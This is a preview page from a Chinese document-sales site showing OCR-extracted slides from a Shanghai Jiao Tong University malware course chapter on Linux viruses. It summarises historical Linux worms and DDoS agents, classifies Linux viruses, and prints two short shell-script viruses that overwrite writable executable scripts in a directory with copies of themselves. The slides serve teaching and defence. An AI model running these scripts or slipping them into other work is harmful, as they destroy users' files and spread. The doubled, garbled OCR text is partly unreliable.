当前位置：和泉文库 > 计算机 > 上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第07章 Linux病毒技术

上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第07章 Linux病毒技术

• 了解Linux的安全问题 • 掌握Linux病毒的概念 • 掌握Linux下的脚本病毒 • 掌握ELF病毒感染方法

文件格式：PPT，文件大小：631KB，售价：13.22元

文档详细内容（约47页）

上游充通大学 SHANGHAI JLAO TONG UNIVERSITY ① MSTREAM.MST:A DDoS agent.It will open TCP port 6732 and UDP port 9325.Create master and server files. © ADORE.A:A internet worm.Overwrite /bin/ps.VExecutes ICMP,and opens port 65535.BIND,wu-ftpd,rpc.statd,Ipd. CHEESE.A:Include"GO"shell script,CHEESE"perl script,and "PSM" ELF.shell script GO runs perl script CHEESE.Delete all /bin/sh in /etc/inetd.conf.Close inetd. QUASI:It will infect ELF files in the current directory.It has no destructiveness. PASS:It is writed by GNU C.It will change Unix shell. 信息安全工程学院

信息安全工程学院 MSTREAM.MST : A DDoS agent. It will open TCP port 6732 and UDP port 9325. Create master and server files. ADORE.A: A internet worm. Overwrite /bin/ps.VExecutes ICMP, and opens port 65535. BIND, wu-ftpd, rpc.statd, lpd. CHEESE.A: Include "GO" shell script, CHEESE“ perl script, and “PSM” ELF.shell script GO runs perl script CHEESE. Delete all /bin/sh in /etc/inetd.conf. Close inetd. QUASI: It will infect ELF files in the current directory. It has no destructiveness. PASS: It is writed by GNU C. It will change Unix shell

上游充廷大学 SHANGHAI JLAO TONG UNIVERSITY Linux病毒分类第一种：Shell脚本病毒 ©第二种：蠕虫病毒第三种：欺骗库函数 ©第四种：内核级的传播第五种：与平台兼容的病毒信息安全工程学院

信息安全工程学院 Virus Threats on Linux Environment Triple Linux病毒分类第一种: Shell脚本病毒第二种: 蠕虫病毒第三种: 欺骗库函数第四种: 内核级的传播第五种: 与平台兼容的病毒

上游充通大学 Linux系统下的脚本病毒 SHANGHAI JLAO TONG UNIVERSITY she在不同的Linux系统上面的差别很小。 Shel简单易学。信息安全工程学院

信息安全工程学院 Linux系统下的脚本病毒 shell在不同的Linux系统上面的差别很小。 Shell简单易学

上游充廷大学第一，最原始的shel川病毒。 SHANGHAI JLAO TONG UNIVERSITY #shellvirus l# for file in ./infect/* 国do cp $0 Sfile done 信息安全工程学院

信息安全工程学院第一，最原始的shell病毒。 #shellvirus I# for file in ./infect/* do cp $0 $file done

上游文通大￥ SHANGHAI JLAO TONG UNIVERSITY 第二，一个简单的Shell,病毒 © #shellvirus ll# 国 for file in ./infect/* do © if test -f Sfile 判断是否为文件 then if test -x Sfile #判断是否可执行 then @ if test -w $file #判断是否有写权限国 then © if grep-ssh$file>.mmm#判断是否为脚本文件国 then 国 cp $0 Sfile #覆盖当前文件 fi © fi fi ⊕ fi 国 done rm .mmm-f 信息安全工程学院

信息安全工程学院第二，一个简单的Shell病毒 #shellvirus II# for file in ./infect/* do if test -f $file #判断是否为文件 then if test -x $file #判断是否可执行 then if test -w $file #判断是否有写权限 then if grep –s sh $file > .mmm #判断是否为脚本文件 then cp $0 $file #覆盖当前文件 fi fi fi fi done rm .mmm -f

点击进入文档下载页（PPT格式）

共47页，可试读17页，点击继续阅读 ↓↓

您可能感兴趣的文档

上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第06章宏病毒
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第05章特洛伊木马（Trojan horse）
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第04章传统计算机病毒
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第03章计算机病毒结构及技术分析
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第02章计算机病毒理论模型
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第01章计算机病毒概述（刘功申）
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第12章计算机病毒防治策略
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第11章常用杀毒软件及其解决方案
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第10章计算机病毒的防范技术
上海交通大学：《程序设计思想与方法》课程教学资源（PPT课件讲稿）第四章循环控制
上海交通大学：《程序设计思想与方法》课程教学资源（PPT课件讲稿）第六章过程封装——函数
上海交通大学：《程序设计思想与方法》课程教学资源（PPT课件讲稿）第五章批量数据处理——数组
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第08章移动智能终端恶意代码
上海交通大学：《恶意代码与计算机病毒（原理、技术和实践）》课程教学资源（PPT课件）第09章新型计算机病毒
上海交通大学：《高级计算机系统结构》课程教学资源（讲稿）
计算机系统结构课程教材：计算机科学丛书《深入理解计算机系统》【兰德尔E.布莱恩特、大卫R.奥哈拉伦】原书第三版（中文版）PDF电子书（共十二章）Computer Systems A Programmer's Perspective
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第一章绪论
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第十章文件、外部排序与外部搜索
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第二章线性表
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第三章栈和队列
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第四章数组、串与广义表
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第五章树
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第六章集合与字典
南京大学：《数据结构 Data Structures》课程教学资源（PPT课件讲稿）第七章搜索结构

点击购买下载（PPT）

下载及服务说明

购买前请先查看本文档预览页，确认内容后再进行支付；
如遇文件无法下载、无法访问或其它任何问题，可发送电子邮件反馈，核实后将进行文件补发或退款等其它相关操作；
邮箱：

文档浏览记录